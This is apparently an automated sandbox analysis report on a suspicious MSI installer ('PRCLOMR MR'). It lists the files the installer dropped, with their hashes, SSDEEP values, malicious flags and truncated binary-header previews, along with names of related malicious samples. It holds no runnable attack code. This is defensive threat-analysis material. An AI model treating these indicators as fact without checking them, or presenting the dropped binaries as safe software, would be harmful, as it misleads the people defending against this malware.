                              Preview:[Hit {1EB6A1EB-8DD2-4460-AB6D-C45D38D3F2E4}]..Queue Time = 93..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {6B773C25-23EA-4760-AEC7-1608F4577E23}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {1D68D7A3-DCC4-42FB-9D17-D7DAF13C7148}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 66ac0c9e2ff508bfba878aa5..Application Version = 8.7.6.8..Client ID = 94BCABD9E1EBB3E75B71854540642746D0A25913..Session ID = {AF3E5550-CCB7-4030-8139-9A55D2075DE7}....[Hit {0D51CAED-92AF-4C30-B938-D9AF0E349F91}]

                              C:\Users\user\AppData\Local\Temp\shi64B2.tmp

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4509696
                              Entropy (8bit):6.100941182830929
                              Encrypted:false
                              SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                              MD5:F6153E803F1533042AC7E6988237C2C3
                              SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                              SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                              SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: LisectAVT_2403002B_409.exe, Detection: malicious, Browse
                              • Filename: AnyDesk.msi, Detection: malicious, Browse
                              • Filename: LisectAVT_2403002B_493.exe, Detection: malicious, Browse
                              • Filename: LisectAVT_2403002B_493.exe, Detection: malicious, Browse
                              • Filename: WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi, Detection: malicious, Browse
                              • Filename: 0cjB1Kh8zU.msi, Detection: malicious, Browse
                              • Filename: 2ztvLMT477.msi, Detection: malicious, Browse
                              • Filename: ahx8PyqunR.msi, Detection: malicious, Browse
                              • Filename: speke.msi, Detection: malicious, Browse
                              • Filename: d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\shi6530.tmp

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):83128
                              Entropy (8bit):6.654653670108596
                              Encrypted:false
                              SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                              MD5:125B0F6BF378358E4F9C837FF6682D94
                              SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                              SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                              SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\surf.xml

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6
                              Entropy (8bit):2.2516291673878226
                              Encrypted:false
                              SSDEEP:3:gpyn:g4n
                              MD5:A067F5EC97BA51B576825B69BC855E58
                              SHA1:907D296538A45D5B593512881D721C7D347B8E04
                              SHA-256:CF3E339D25C3C023C9417FFC5D8E73F1DA828B18FEECAF14FDB9C24D04E49BA0
                              SHA-512:F6058F37CF764E6CD807D9C0E9DE881849E4C94EC1D2E0C0EB504ABF77147E77CB09113B087E1C10E790C3EC45780E5986D29B2A84B364C5F697F884B1549F4D
                              Malicious:false
                              Preview:NULL..

                              C:\Windows\Installer\495fa1.msi

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {884C282A-B0FB-4975-844E-5DC3BC12BA4B}, Number of Words: 10, Subject: PRCLOMR MR, Author: PRCLOMR MR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados PRCLOMR MR necessrios para instalar o PRCLOMR MR., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                              Category:dropped
                              Size (bytes):12885696
                              Entropy (8bit):7.898527997571246
                              Encrypted:false
                              SSDEEP:393216:x99OsRVjtNK9oUMZ73hrLcoV7UBOQZ3M+:x9lN+HWlLco+MQhp
                              MD5:E39E03A8E95AEC841D8EC9E1AB3D5706
                              SHA1:3D9812935A2413FEA198C3B11BF48769385BB077
                              SHA-256:7B67C71AE5AA24C92655D29E37896F639FA42FA79713B174C6A660F5C19E49A2
                              SHA-512:4878F455E8824ED2914F4A155DAEB501CF45385440CFE6CC91FD43DFE68C4F014202F67DB389A1A06DE20BD0053231C91ECBF4F7D03E66ECEFAC1C64DE4D9CDC
                              Malicious:false
                              Preview:......................>...................$...................................................................................................................J...K...L...M...N...O...P...Q...R...S...T...U...........v...................................................................................................................................................................................................................................................................................................................c...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...@...C...9...:...;...<...=...>...?...Q...A...B...H...D...E...F...G...p...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......b...d...u...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...v.......w...x...y...z...

                              C:\Windows\Installer\MSI6185.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI62DE.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI635C.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI6467.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI6487.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):878560
                              Entropy (8bit):6.452749824306929
                              Encrypted:false
                              SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                              MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                              SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                              SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                              SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI6F17.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI6F47.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI7003.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):388064
                              Entropy (8bit):6.407392408414975
                              Encrypted:false
                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                              MD5:20C782EB64C81AC14C83A853546A8924
                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI7033.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\MSI70A2.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:data
                              Category:modified
                              Size (bytes):2363
                              Entropy (8bit):5.527069650585703
                              Encrypted:false
                              SSDEEP:48:/xuL2UA4b7wNY+DwX1AX6gnwVEnkanDwEfqkKfr47CMTaH:5uVACWTDG1i6gncEkiDhfqkKfrsaH
                              MD5:2462B04E1000D6AE7FD6487765DAD21A
                              SHA1:1B0BA21F2F11748F546A7ADD0EE60D79C15775B0
                              SHA-256:5F839FA5B5A6200CA56A48876FC7A9398D31329529B0DDACE251C39B8CF732C4
                              SHA-512:49F792DA0F4154786D67C19D197720778C4A97FEE6F375C4487BE0ABE5F6B92975B9B90440369D8A006224ABB890DCFFC83042415986E7A8963666C9FFF3CEBC
                              Malicious:false
                              Preview:...@IXOS.@.....@.B.Y.@.....@.....@.....@.....@.....@......&.{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}..PRCLOMR MR..9rybs.msi.@.....@.....@.....@........&.{884C282A-B0FB-4975-844E-5DC3BC12BA4B}.....@.....@.....@.....@.......@.....@.....@.......@......PRCLOMR MR......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{9A647FB6-8DED-4CFE-ACBA-2BDC554A74E7}4.C:\Users\user\AppData\Roaming\PRCLOMR MR\PRCLOMR MR\.@.......@.....@.....@......&.{5B41ECFF-AC7E-444D-A1FB-D627EBF6BEE1}*.01:\Software\PRCLOMR MR\PRCLOMR MR\Version.@.......@.....@.....@......&.{82C9FF59-DD7E-4CEC-8A97-4FEE517BCB1B}K.01:\Software\PRCLOMR MR\{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Criando novas pastas..Pasta: [1]".4.C:\Users\user\AppData\Roaming\PRCLOMR MR\PRCLOMR MR\.@........WriteRegistryValues,.Escrevendo os

                              C:\Windows\Installer\MSI9F25.tmp

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):780768
                              Entropy (8bit):6.387720196228063
                              Encrypted:false
                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                              MD5:573F5E653258BF622AE1C0AD118880A2
                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\SourceHash{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):1.1629763799366026
                              Encrypted:false
                              SSDEEP:12:JSbX72FjR/fiAGiLIlHVRpMh/7777777777777777777777777vDHF8Zm2WEQp3j:JCQI5cR2WEq6F
                              MD5:07348CF3B1AFA58D96732BBB8132E577
                              SHA1:E9898F672161D04B252FF7FF2AED8287DAACF70B
                              SHA-256:ECD7D4EF5E08C22EF7D121B0A756D82D6D8DAC422C4589A5A21E97308D22BB32
                              SHA-512:83A9447A98E09C77C3050160C13847D9003F184F4C1E0C54F455F1DFE487480B702A03BCCD65808C36F6204497AD82A49A5931CADB8ACD4A2A88DCF17A982F24
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Installer\inprogressinstallinfo.ipi

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):1.8163106328726237
                              Encrypted:false
                              SSDEEP:96:Phl1uFTZcdvRl1vR8v5CbFWco2WGlvRl1vRW:T1ct2vRl1vR8vOFWFGlvRl1vRW
                              MD5:7F714784E1BBE635E34F04CB6DB7E421
                              SHA1:3198BF6EE9A7BDA0126FEF075A9A9111FFD50F41
                              SHA-256:FBCE84DC1BCAF6AF6EF2BF1A5FA35852C2EE52C64B464A6E04FDF1B739E38FD4
                              SHA-512:6BCFD534765480E1D50A3BC84F7736600FAAA1E69A0A50E364C8B8EB89BAB12C77EF8445AA1F27467C52D1B00637B4A86D4F9AA8F9DA68281DF3BC6AF3A36818
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):360001
                              Entropy (8bit):5.362964772669496
                              Encrypted:false
                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauh:zTtbmkExhMJCIpE8
                              MD5:413FE814F0C1F41F1F87970315F0FA27
                              SHA1:5D95820EEBDCB43C619BD1C9D70A2060AC9FA700
                              SHA-256:FD7850FAC79B8B68DB2FB86E866A6B4EB98F1F86B4E8677864F61F00EB9B07A4
                              SHA-512:AAD2D212107C85A676D8CDC7BEA51BD9A4705B53423DBC559606F75B7C66645D16CF8E568B84D8DB7CA149B63353AB6D52EA6D0D0BD1D75FB0EAD14AA5B2BCDC
                              Malicious:false
                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                              C:\Windows\Temp\~DF218F0E8B2A772D72.TMP

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):1.8163106328726237
                              Encrypted:false
                              SSDEEP:96:Phl1uFTZcdvRl1vR8v5CbFWco2WGlvRl1vRW:T1ct2vRl1vR8vOFWFGlvRl1vRW
                              MD5:7F714784E1BBE635E34F04CB6DB7E421
                              SHA1:3198BF6EE9A7BDA0126FEF075A9A9111FFD50F41
                              SHA-256:FBCE84DC1BCAF6AF6EF2BF1A5FA35852C2EE52C64B464A6E04FDF1B739E38FD4
                              SHA-512:6BCFD534765480E1D50A3BC84F7736600FAAA1E69A0A50E364C8B8EB89BAB12C77EF8445AA1F27467C52D1B00637B4A86D4F9AA8F9DA68281DF3BC6AF3A36818
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Temp\~DF5ABB72A42C3689C8.TMP

                              Download File
                              Process:C:\Windows\System32\msiexec.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):49152
                              Entropy (8bit):1.1930649884596116
                              Encrypted:false
                              SSDEEP:96:9dToTZ8+cdvRl1vR8v5CbFWco2WGlvRl1vRW:bTodl2vRl1vR8vOFWFGlvRl1vRW
                              MD5:D775FEA4C65C18EA262E874595C06CAF
